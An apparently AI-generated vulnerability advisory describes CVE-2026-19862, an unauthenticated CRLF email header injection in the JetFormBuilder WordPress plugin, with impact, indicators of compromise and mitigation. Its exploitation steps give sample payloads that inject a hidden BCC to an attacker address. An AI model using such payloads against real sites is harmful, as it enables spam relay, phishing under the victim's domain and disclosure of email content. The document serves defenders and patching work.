Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2026-19862
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-19862 is an unauthenticated email header injection vulnerability in the JetFormBuilder WordPress plugin affecting all versions before 3.6.5.2. The flaw allows unauthenticated attackers to inject arbitrary email headers, add hidden recipients, and spoof the sender address by submitting form fields containing unstripped line breaks. It was publicly disclosed on September 3, 2026, and assigned a CVSS v3.1 base score of 4.8 (Medium) (WPScan, GitHub Advisory).

Technical details

The root cause is CWE-93 (Improper Neutralization of CRLF Sequences / CRLF Injection): the plugin fails to validate or strip carriage return and line feed characters from address values sourced from submitted form fields before incorporating them into outgoing email headers (GitHub Advisory). An attacker can inject \r\n sequences into a form field value (e.g., a "Reply-To" or "From" address field) to terminate the current header and insert additional arbitrary headers. Exploitation requires a specific site configuration where at least one email address in the plugin's "Send Email" action is populated from a user-submitted form field (WPScan). No authentication is required, but attack complexity is rated High due to this configuration prerequisite.

Impact

Successful exploitation allows an unauthenticated attacker to manipulate outgoing emails generated by the plugin's "Send Email" action — specifically by adding hidden BCC/CC recipients, spoofing the sender address, or injecting other arbitrary headers. This can facilitate spam relay abuse, phishing campaigns using the victim site's domain, and unauthorized disclosure of email content to unintended recipients. There is no direct availability impact, and the confidentiality and integrity impacts are limited in scope (WPScan, GitHub Advisory).

Exploitability

No public proof-of-concept exploit code is currently available; WPScan has indicated a PoC will be published on September 17, 2026, to allow time for users to update (WPScan). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog (GitHub Advisory). The EPSS score is approximately 0.154%, indicating a low near-term exploitation probability. The vulnerability was discovered and reported by researcher Emirhan Kurt (WPScan).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites using the JetFormBuilder plugin (versions before 3.6.5.2) with a contact or inquiry form that passes a user-supplied field (e.g., "Your Email") directly into the plugin's "Send Email" action as a header address (From, Reply-To, etc.).
  2. Craft malicious payload: Prepare a form submission where the email address field contains a CRLF injection payload, for example: attacker@example.com\r\nBcc: hidden@attacker.com or attacker@example.com\r\nX-Custom-Header: injected.
  3. Submit the form: Submit the form via a standard HTTP POST request — no authentication is required. The plugin processes the field value without stripping the \r\n sequences.
  4. Header injection occurs: The plugin constructs the email headers using the unsanitized value, causing the injected content to be interpreted as additional headers by the mail transfer agent, adding hidden recipients or spoofing the sender.
  5. Achieve objective: Emails sent by the site are now relayed to attacker-controlled addresses, or the sender is spoofed to facilitate phishing using the victim site's domain (WPScan).

Indicators of compromise

  • Logs: Web server access logs showing POST requests to form submission endpoints with URL-encoded %0d%0a, %0a, or %0d sequences in email address parameters.
  • Email Server: Outbound emails from the WordPress site with unexpected BCC/CC recipients, unusual X- headers, or a spoofed From address not matching the site's configured sender.
  • Application Logs: PHP or WordPress debug logs showing unexpected header values being passed to mail functions (e.g., wp_mail()) containing newline characters.
  • Network: Unusual volume of outbound SMTP traffic from the web server, potentially indicating spam relay abuse following successful injection.

Mitigation and workarounds

Update the JetFormBuilder plugin to version 3.6.5.2 or later, which validates and strips line breaks from address values before they are used in email headers (WPScan, GitHub Advisory). As a temporary workaround, administrators should reconfigure the plugin's "Send Email" action to use static, hardcoded address values rather than populating any address field (From, Reply-To, CC, BCC) from user-submitted form data. Additionally, deploying a web application firewall (WAF) rule to block requests containing CRLF sequences (\r\n) in form parameters can reduce exposure until patching is complete.

Community reactions

The vulnerability was discovered by independent researcher Emirhan Kurt and responsibly disclosed through WPScan (WPScan). WPScan has adopted a coordinated disclosure approach, withholding the full proof-of-concept until September 17, 2026, to provide a remediation window for site administrators. No significant broader media coverage or notable community commentary has been identified beyond standard vulnerability database aggregation.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86801HIGH8.8
  • todo-lists-for-membership-sites
NoNoSep 17, 2026
CVE-2026-87963HIGH8.6
  • yo
NoNoSep 17, 2026
CVE-2026-91016MEDIUM5.3
  • motors-car-dealership-classified-listings
NoYesSep 17, 2026
CVE-2026-91019MEDIUM4.9
  • mage-eventpress
NoYesSep 17, 2026
CVE-2026-91017LOW3.7
  • robokassa
NoYesSep 17, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management